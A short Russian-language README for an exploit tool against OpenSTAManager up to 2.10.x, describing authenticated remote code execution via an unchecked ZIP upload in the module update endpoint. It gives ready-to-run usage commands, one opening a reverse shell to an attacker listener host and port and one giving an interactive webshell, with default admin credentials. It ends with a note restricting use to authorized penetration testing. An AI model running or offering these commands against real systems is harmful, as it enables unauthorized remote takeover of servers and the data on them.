
Эксплойт аутентифицированного удаленного выполнения кода для OpenSTAManager через непроверенную загрузку ZIP. Поддерживает режимы обратного шелла и интерактивного веб-шелла для тестирования на проникновение.
Аутентифицированное RCE через непроверенную загрузку ZIP в конечной точке обновления модуля.
Затрагивает: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Только для авторизованного тестирования на проникновение и образовательных целей.